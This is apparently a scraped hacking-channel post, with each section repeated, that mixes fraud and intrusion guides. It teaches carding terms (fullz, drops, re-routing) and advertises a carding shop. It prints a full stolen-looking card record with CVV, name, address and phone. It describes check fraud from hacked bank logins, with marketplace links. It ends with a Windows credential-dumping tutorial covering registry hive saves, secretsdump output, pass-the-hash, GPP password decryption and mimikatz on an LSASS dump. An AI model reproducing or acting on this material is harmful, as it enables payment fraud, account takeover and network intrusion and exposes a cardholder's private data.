β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Carding
> types of Visa
1 Classic: The Card is used worldwide in any locations designated by Visa, including ATMs, real and virtual Stores, and shops offering goods and services by mail and telephone.
2 Gold β This card has a higher limit capacity. Most used card and adopted worldwide.
3 Platinum β Card is having limits over $10,000.
4 Signature β No preset spending limit β great bin to get
5 Infinite β Most prestigious card with having virtually no limit. There is less in circulation so be alert when buying these. Use only with reputable sellers!
6 Business β it can be used for small to medium sized businesses, usually has a limit.
7 Corporate β it can be used with medium to large size businesses, having more limit than a Business card.
8 Black β It has limited membership. It has no limit only having $500 annual fee, high-end card.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Carding
> types of Visa
1 Classic: The Card is used worldwide in any locations designated by Visa, including ATMs, real and virtual Stores, and shops offering goods and services by mail and telephone.
2 Gold β This card has a higher limit capacity. Most used card and adopted worldwide.
3 Platinum β Card is having limits over $10,000.
4 Signature β No preset spending limit β great bin to get
5 Infinite β Most prestigious card with having virtually no limit. There is less in circulation so be alert when buying these. Use only with reputable sellers!
6 Business β it can be used for small to medium sized businesses, usually has a limit.
7 Corporate β it can be used with medium to large size businesses, having more limit than a Business card.
8 Black β It has limited membership. It has no limit only having $500 annual fee, high-end card.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ TERMS USED IN CARDING
> CC = means - Credit Card.
> CC FULLZ = means - CC details with all major Information about
the cc holder Which aside the ordinary cvv details "Fullz" includes D.O.B,
SSN, MMN & Security Q & A.
> VBV = means - Verified By Visa or NON - VBV.
> BTC = means BITCOIN.
> MCSC = means - MasterCard Secured Code.
> DROP = means - The Address where You want Your Carded items to be shipped to.
> CITY + STATE = means - Your IP's location which is Country or State and City must match the Billing City and State on the CC.
> BILL=SHIP = means - The CC Billing Address should be the 'Exact Same' as the Shipping Address 100%.
> ZIPCC/CCZIPCODE = Means - Similar meaning as the case of "City + State".
> CCSTATE/STATECC = Means - The CC Country and State should be
'Exact Same' as The Drop Address.
> RE-ROUTE = Means - Calling or Chatting Customer service to Change Bill=Ship to Ship to Drop Address But mostly maintaining CC name and Phone number by just giving out the drop Address as the Correct address to receive the Shipment.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ TERMS USED IN CARDING
> CC = means - Credit Card.
> CC FULLZ = means - CC details with all major Information about
the cc holder Which aside the ordinary cvv details "Fullz" includes D.O.B,
SSN, MMN & Security Q & A.
> VBV = means - Verified By Visa or NON - VBV.
> BTC = means BITCOIN.
> MCSC = means - MasterCard Secured Code.
> DROP = means - The Address where You want Your Carded items to be shipped to.
> CITY + STATE = means - Your IP's location which is Country or State and City must match the Billing City and State on the CC.
> BILL=SHIP = means - The CC Billing Address should be the 'Exact Same' as the Shipping Address 100%.
> ZIPCC/CCZIPCODE = Means - Similar meaning as the case of "City + State".
> CCSTATE/STATECC = Means - The CC Country and State should be
'Exact Same' as The Drop Address.
> RE-ROUTE = Means - Calling or Chatting Customer service to Change Bill=Ship to Ship to Drop Address But mostly maintaining CC name and Phone number by just giving out the drop Address as the Correct address to receive the Shipment.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Unicc shop will work under blockchain domain:
t.me/UndercodeTesting
> http://uniccshop.bazar/
You can easily get access to that when you install browser addon.
>https://blockchain-dns.info/ - download here for Firefox, Chrome
> https://peername.com/browser-extension/ - here for Opera
Or make use of https://fri-gate.org/ addon
But if you have another browser or another device (iOS, Android):
> Use https://www.opennic.org/ DNS servers, which will help you get access to our domain.
Change your internet connection DNS settings and set up one of the servers from the list: https://servers.opennic.org/
> Our extension improves and speeds up access to sites, without causing any inconvenience. With the help of the original algorithm of work, the speed of access to sites is increasing, which is very important.
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Unicc shop will work under blockchain domain:
t.me/UndercodeTesting
> http://uniccshop.bazar/
You can easily get access to that when you install browser addon.
>https://blockchain-dns.info/ - download here for Firefox, Chrome
> https://peername.com/browser-extension/ - here for Opera
Or make use of https://fri-gate.org/ addon
But if you have another browser or another device (iOS, Android):
> Use https://www.opennic.org/ DNS servers, which will help you get access to our domain.
Change your internet connection DNS settings and set up one of the servers from the list: https://servers.opennic.org/
> Our extension improves and speeds up access to sites, without causing any inconvenience. With the help of the original algorithm of work, the speed of access to sites is increasing, which is very important.
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦CCnum:: 4246315229559099
Cvv: 180
Expm: 04
Expy: 22
Fname: Christopher
Lname: Keon
Address: 86 Trinity Circle
City: FOUR OAKS
State: NC
Zip: 27524
Country: USA
Phone: 9103669170
Cvv: 180
Expm: 04
Expy: 22
Fname: Christopher
Lname: Keon
Address: 86 Trinity Circle
City: FOUR OAKS
State: NC
Zip: 27524
Country: USA
Phone: 9103669170
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦CARDING HOW TO THROW CHECK ?
fb.com/UndercodeTesting
π¦ Tools
1)Bank Log ( Wells Fargo, Chase, SunTrust, TD Bank etc )
2)RDP
4) Checkbook
3) Common Sense
π¦ Where i usually Get the tools.
1. http://slilpp.net
2. http://ordaproject.me/ (my new favorite)
3. http://pwoah7foa6au2pul.onion/search.php?s_userid=11513 safetybets on AlphaBay
Marketplace
π¦ This next one is not as popular but they have really quality accounts.
4. http://www.sanwells.ws
5. www.checkbook.io (Here is where you get the Checks From)
The Bank Log Info we need (minimum)
For this process we need the following info:
β’ Account holder name
β’ Account Balance(so we know how much to send!)
β’ Online Bank login Details.
π¦ This can be accomplished with any bank that offers online banking, but I am going to run
through the process using Wells Fargo accounts as an Example.
Monitoring account balance and transaction history
> This will teach you how to monitor account balance and transaction history without even needing
> to login on the accounts and risk getting locked out whether it's your own bank drop or a hacked
> Wells Fargo login, it doesn't matter! Once you are in possession of full account numbers and
π¦ routing and all details, then you should go to this website:
http://www.mint.com and apply with the full details to a free monitoring account Once you have
gotten the full account information create an account at mint.com and add the bank account. It's
very easy to do with the full account numbers/information you should have no problem
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦CARDING HOW TO THROW CHECK ?
fb.com/UndercodeTesting
π¦ Tools
1)Bank Log ( Wells Fargo, Chase, SunTrust, TD Bank etc )
2)RDP
4) Checkbook
3) Common Sense
π¦ Where i usually Get the tools.
1. http://slilpp.net
2. http://ordaproject.me/ (my new favorite)
3. http://pwoah7foa6au2pul.onion/search.php?s_userid=11513 safetybets on AlphaBay
Marketplace
π¦ This next one is not as popular but they have really quality accounts.
4. http://www.sanwells.ws
5. www.checkbook.io (Here is where you get the Checks From)
The Bank Log Info we need (minimum)
For this process we need the following info:
β’ Account holder name
β’ Account Balance(so we know how much to send!)
β’ Online Bank login Details.
π¦ This can be accomplished with any bank that offers online banking, but I am going to run
through the process using Wells Fargo accounts as an Example.
Monitoring account balance and transaction history
> This will teach you how to monitor account balance and transaction history without even needing
> to login on the accounts and risk getting locked out whether it's your own bank drop or a hacked
> Wells Fargo login, it doesn't matter! Once you are in possession of full account numbers and
π¦ routing and all details, then you should go to this website:
http://www.mint.com and apply with the full details to a free monitoring account Once you have
gotten the full account information create an account at mint.com and add the bank account. It's
very easy to do with the full account numbers/information you should have no problem
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Facebook
Log in or sign up to view
See posts, photos and more on Facebook.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ DUMPING ACCOUNTS FROM WINDOWS TUTORIAL :
t.me/UndercodeTesting
1) Dumping credentials on a Windows host
Once youβve fully compromised a Windows host (by gaining SYSTEM-level privileges), your next move is to gather as many credentials as possible because they could grant you a greater level of access on the network, or the same passwords could be used elsewhere on other critical assets.
2) If the Windows host is part of an Active Directory domain, youβll be on the hunt for privileged domain accounts, and your target will be (preferably) a member of the Domain Admins group.
π¦The following techniques can be used to dump Windows credentials from an already-compromised Windows host.
3) Registry Hives
Get a copy of the SYSTEM, SECURITY and SAM hives and download them back to your local system:
C:\> reg.exe save hklm\sam c:\temp\sam.save
C:\> reg.exe save hklm\security c:\temp\security.save
C:\> reg.exe save hklm\system c:\temp\system.save
Password Hashes
4) Get the password hashes of the local accounts, the cached domain credentials and the LSA secrets in a single run with secretsdump :
$ secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
Impacket v0.9.11-dev - Copyright 2002-2013 Core Security Technologies
[*] Target system bootKey: 0x602e8c2947d56a95bf9cfad9e0bbbace
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
renadm:500:aad3b435b51404eeaad3b435b51404ee:3e24dcead23468ce597d6883c576f657:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
support:1000:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
[*] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)
hdes:6ec74661650377df488415415bf10321:securus.corp.com:SECURUS:::
Administrator:c4a850e0fee5af324a57fd2eeb8dbd24:SECURUS.CORP.COM:SECURUS:::
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:2fb3672702973ac1b9ade0acbdab432f
...
Local SAM Hashes
Crack the LM hashes (if any) using Ophcrack .
Crack the NT hashes using JtR or hashcat .
Remember that if you canβt crack promising password hashes, you can just pass the hash against other accounts using the same password on other hosts or even the domain.
π¦ DUMPING ACCOUNTS FROM WINDOWS TUTORIAL :
t.me/UndercodeTesting
1) Dumping credentials on a Windows host
Once youβve fully compromised a Windows host (by gaining SYSTEM-level privileges), your next move is to gather as many credentials as possible because they could grant you a greater level of access on the network, or the same passwords could be used elsewhere on other critical assets.
2) If the Windows host is part of an Active Directory domain, youβll be on the hunt for privileged domain accounts, and your target will be (preferably) a member of the Domain Admins group.
π¦The following techniques can be used to dump Windows credentials from an already-compromised Windows host.
3) Registry Hives
Get a copy of the SYSTEM, SECURITY and SAM hives and download them back to your local system:
C:\> reg.exe save hklm\sam c:\temp\sam.save
C:\> reg.exe save hklm\security c:\temp\security.save
C:\> reg.exe save hklm\system c:\temp\system.save
Password Hashes
4) Get the password hashes of the local accounts, the cached domain credentials and the LSA secrets in a single run with secretsdump :
$ secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
Impacket v0.9.11-dev - Copyright 2002-2013 Core Security Technologies
[*] Target system bootKey: 0x602e8c2947d56a95bf9cfad9e0bbbace
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
renadm:500:aad3b435b51404eeaad3b435b51404ee:3e24dcead23468ce597d6883c576f657:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
support:1000:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
[*] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)
hdes:6ec74661650377df488415415bf10321:securus.corp.com:SECURUS:::
Administrator:c4a850e0fee5af324a57fd2eeb8dbd24:SECURUS.CORP.COM:SECURUS:::
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:2fb3672702973ac1b9ade0acbdab432f
...
Local SAM Hashes
Crack the LM hashes (if any) using Ophcrack .
Crack the NT hashes using JtR or hashcat .
Remember that if you canβt crack promising password hashes, you can just pass the hash against other accounts using the same password on other hosts or even the domain.
π¦ Cached Domain Credentials
1) These are the password hashes of domain users that have logged on to the host previously.
> Crack them using JtR or hashcat. Remember to specify the right format, which is either mscash (xp, w2k3) or mscash2 (vista, w7, w2k8 β¦). Note that you canβt perform βpass-the-hashβ style attacks with this type of hash.
2) LSA Secrets
Here, you will find account passwords for services that are set to run under actual Windows user accounts (as opposed to Local System, Network Service and Local Service), the auto-logon password and more.
3) If the Windows host is part of a domain, you will find the domain credentials of the machine account with which you can authenticate to the domain to list domain users and admins as well as browsing shares and so on.
4) Use pth on Kali Linux or wce on your own Windows system to use these credentials.
$ pth-net rpc user -U 'securus\john-pc$%aad3b435b51404eeaad3b435b51404ee:2fb3672702973ac1b9ade0acbdab432f' -S dc1.securus.corp.com
Administrator
hdes
...
5) Browse shares for passwords, look on the domain controller for passwords in Group Policy Preferences (GPP) that can be decrypted :
C:\> wce.exe -s john-pc:securus:aad3b435b51404eeaad3b435b51404ee:2fb3672702973ac1b9ade0acbdab432f
C:\> findstr /S cpassword \\dc1.securus.corp.com\sysvol\*.xml
\\192.168.122.55\sysvol\securus.corp.com\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml: ="" description="" cpassword="1MJPOM4MqvDWWJq5IY9nJqeUHMMt6N2CUtb7B/jRFPs" changeLogon="0" noChange="0" neverExpires="0" acctDisabled="1" subAuthority="RID_ADMIN" userName="Administrator (built-in)"/>
C:\> ruby gppdecrypt.rb 1MJPOM4MqvDWWJq5IY9nJqeUHMMt6N2CUtb7B/jRFPs
1q2w3e4r5t
π¦In-Memory Credentials
Dump clear-text passwords from memory using mimikatz and the Windows Task Manager to dump the LSASS process.
1) To do this, dump the lsass.exe process to a file using Windows built-in Task Manager with right-clicking βlsass.exeβ then selecting βCreate Dump Fileβ (since Vista) or Procdump (pre Vista) β alternatively, use some powershell-fu (see carnal0wnage blog post):
C:\> procdump.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp 2>&1
2) Then dump the credentials offline using mimikatz and its minidump module:
C:\> mimikatz.exe log "sekurlsa::minidump lsass.dmp" sekurlsa::logonPasswords exit
3) Make sure you run mimikatz on the same major version and same architecture you pulled the process dump from (refer to this ).
Alternatively, you can upload and run wce on the host, but the binary is likely to get picked up by most Anti Virus software. Also, note that wce-v1.41beta still doesnβt seem to dump the passwords of outbound SMB sessions (that can be listed with βnet useβ on the compromised Windows system), although mimikatz will.
1) These are the password hashes of domain users that have logged on to the host previously.
> Crack them using JtR or hashcat. Remember to specify the right format, which is either mscash (xp, w2k3) or mscash2 (vista, w7, w2k8 β¦). Note that you canβt perform βpass-the-hashβ style attacks with this type of hash.
2) LSA Secrets
Here, you will find account passwords for services that are set to run under actual Windows user accounts (as opposed to Local System, Network Service and Local Service), the auto-logon password and more.
3) If the Windows host is part of a domain, you will find the domain credentials of the machine account with which you can authenticate to the domain to list domain users and admins as well as browsing shares and so on.
4) Use pth on Kali Linux or wce on your own Windows system to use these credentials.
$ pth-net rpc user -U 'securus\john-pc$%aad3b435b51404eeaad3b435b51404ee:2fb3672702973ac1b9ade0acbdab432f' -S dc1.securus.corp.com
Administrator
hdes
...
5) Browse shares for passwords, look on the domain controller for passwords in Group Policy Preferences (GPP) that can be decrypted :
C:\> wce.exe -s john-pc:securus:aad3b435b51404eeaad3b435b51404ee:2fb3672702973ac1b9ade0acbdab432f
C:\> findstr /S cpassword \\dc1.securus.corp.com\sysvol\*.xml
\\192.168.122.55\sysvol\securus.corp.com\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml: ="" description="" cpassword="1MJPOM4MqvDWWJq5IY9nJqeUHMMt6N2CUtb7B/jRFPs" changeLogon="0" noChange="0" neverExpires="0" acctDisabled="1" subAuthority="RID_ADMIN" userName="Administrator (built-in)"/>
C:\> ruby gppdecrypt.rb 1MJPOM4MqvDWWJq5IY9nJqeUHMMt6N2CUtb7B/jRFPs
1q2w3e4r5t
π¦In-Memory Credentials
Dump clear-text passwords from memory using mimikatz and the Windows Task Manager to dump the LSASS process.
1) To do this, dump the lsass.exe process to a file using Windows built-in Task Manager with right-clicking βlsass.exeβ then selecting βCreate Dump Fileβ (since Vista) or Procdump (pre Vista) β alternatively, use some powershell-fu (see carnal0wnage blog post):
C:\> procdump.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp 2>&1
2) Then dump the credentials offline using mimikatz and its minidump module:
C:\> mimikatz.exe log "sekurlsa::minidump lsass.dmp" sekurlsa::logonPasswords exit
3) Make sure you run mimikatz on the same major version and same architecture you pulled the process dump from (refer to this ).
Alternatively, you can upload and run wce on the host, but the binary is likely to get picked up by most Anti Virus software. Also, note that wce-v1.41beta still doesnβt seem to dump the passwords of outbound SMB sessions (that can be listed with βnet useβ on the compromised Windows system), although mimikatz will.
π¦Credential Manager :
1) When a user authenticates to a network share, a proxy, or uses a piece of client software and ticks the βRemember my passwordβ box, the password is typically stored in an encrypted vault using the Windows Data Protection API. You can see every saved credential in the Credential Manager (accessed through User Accounts in the Control Panel), and you can dump them with Network Password Recovery . Remember to run the 64-bit version on a 64-bit Windows instances, or you wonβt get them all.
2) Protected Storage
Dump any passwords remembered in IE, Outlook or MSN using Protected Storage PassView .
3) Third-party software
NirSoft offers many tools to recover passwords stored by third-party software.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
1) When a user authenticates to a network share, a proxy, or uses a piece of client software and ticks the βRemember my passwordβ box, the password is typically stored in an encrypted vault using the Windows Data Protection API. You can see every saved credential in the Credential Manager (accessed through User Accounts in the Control Panel), and you can dump them with Network Password Recovery . Remember to run the 64-bit version on a 64-bit Windows instances, or you wonβt get them all.
2) Protected Storage
Dump any passwords remembered in IE, Outlook or MSN using Protected Storage PassView .
3) Third-party software
NirSoft offers many tools to recover passwords stored by third-party software.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β